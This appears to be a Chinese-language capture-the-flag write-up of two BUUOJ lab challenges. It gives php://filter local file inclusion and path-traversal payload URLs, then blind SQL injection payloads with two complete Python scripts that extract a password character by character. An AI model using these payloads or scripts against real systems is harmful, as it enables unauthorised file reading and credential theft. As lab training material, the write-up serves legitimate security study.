[BSidesCF 2020]Had a bad day
试一试:index.php但是没反应!
后来发现只有绝对路径!/var/www/html/index.php
payload1:
http://9c0ca921-9fa2-4a89-b31b-750748be1868.node3.buuoj.cn/index.php?category=pHp://FilTer/convert.base64-encode/resource=index
http://9c0ca921-9fa2-4a89-b31b-750748be1868.node3.buuoj.cn/index.php?category=pHp://FilTer/convert.base64-encode/resource=/var/www/html/index
/var/www/html/index
|
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
|
看了源码知道了这里的:过滤规则!
strpos — 查找字符串首次出现的位置
返回值:
返回 needle 存在于 haystack 字符串起始的位置(独立于 offset)。同时注意字符串位置是从0开始,而不是从1开始的。
如果没找到 needle,将返回 **false**。
如果直接输入index就返回0,所以就不会执行!但是输入1index,就返回1;就可以让他报错,显示报错信息!
直接:
http://9c0ca921-9fa2-4a89-b31b-750748be1868.node3.buuoj.cn/index.php?category=111index/../flag
|
ooooo:
理解:woofers/../flag这个东西理解的半天!!tcl
就是顺便一个文件夹,/这个文件夹的当前目录! ../返回上一级!再flag就可以直接读了!
payload2
php://filter/read=convert.base64-encode/woofers/resource=index
http://9c0ca921-9fa2-4a89-b31b-750748be1868.node3.buuoj.cn/index.php?category=pHp://FilTer/convert.base64-encode/resource=woofers/../flag
也可以用php://filter伪协议可以套一层协议(这个还会有报错!!)
php://filter/read=convert.base64-encode/woofers/resource=index
php://filter/read=convert.base64-encode/woofers/resource=flag
|
[BJDCTF 2nd]简单注入
刚刚看了韩国的电影!!!
韩国电影真该拍呀!!!每次看韩国电影!感受很多!
You konw ,P3rh4ps needs a girl friend
提示很明显了!应该是sql注入!!!
访问:hint.txt
Only u input the correct password then u can get the flag
and p3rh4ps wants a girl friend.
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
//鍑洪浜哄洓绾у帇绾挎墠杩� 瑙佽皡瑙佽皡 棰嗕細绮剧
select * from users where username='1\' and password='$_POST["password"]';
select * from users where username='1\' and password='or/**/if(1,sleep(3),0)#';
|
就是登录就有flag!
fuzz一下:
过滤了:
union select 单引号‘ 双引号“ and = 等!
也没有回显!
想了想报错注入:
但是报错要select而且后面要用=而且like也没了!还是盲注把!!
payload1:
or/**/if(1,sleep(3),0)#
or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid)
or/**/if(ascii(substr(username,%d,1))>%d,sleep(3),0)#"%(i,mid)
试了试!:
or/**/if(ascii(substr(username,%d,1))>%d,sleep(3),0)#"
payload["password"]="or/**/if(ascii(substr(password,%d,1))>%d,sleep(3),0)#" %(i,mid)
admin
|
exp:
import requests
import time
payload = {
"username" : "1\\",
"password" : ""
}
payload1 = {
"username" : "",
"password" : "111"
}
def login(payload):
url= "http://fbae1ca3-500b-4a80-bf56-7e78489ec089.node3.buuoj.cn/"
before_time = time.time()
response = requests.post(url,data=payload)
if response.status_code == 429:
print('too fast')
time.sleep(4)
content = response.content
if "Hacker" in content:
print "[-] WAF"
exit(1)
after_time = time.time()
offset = after_time - before_time
if offset > 2.5:
return True
else:
return False
def main():
data = "result : "
print("begin:")
for i in range(1,500):
f1=data
top=127
low=33
while low<=top:
mid=(top+low)//2
payload["password"]="or/**/if(ascii(substr(password,%d,1))>%d,sleep(3),0)#"%(i,mid)
print(payload)
if login(payload):
low=mid+1
else:
top=mid-1
data += chr(low)
print "[+] Found : %s" % (data)
if data==f1:
break
if __name__ == "__main__":
main()
|
看某位师傅的exp:
import requests
import time
url = "http://fbae1ca3-500b-4a80-bf56-7e78489ec089.node3.buuoj.cn/"
data = {"username":"admin\\","password":""}
result = ""
i = 0
while( True ):
i = i + 1
head=32
tail=127
while( head < tail ):
mid = (head + tail) >> 1
payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#"%(i,mid)
data['password'] = payload
r = requests.post(url,data=data)
if "stronger" in r.text :
head = mid + 1
else:
tail = mid
if r.status_code == 429:
print("fast")
time.sleep(2)
last = result
if head!=32:
result += chr(head)
else:
break
print(result)
|
有一点注意!二分算法!!!!!最后的取值结果!应该是low如果是mid是由问题的!
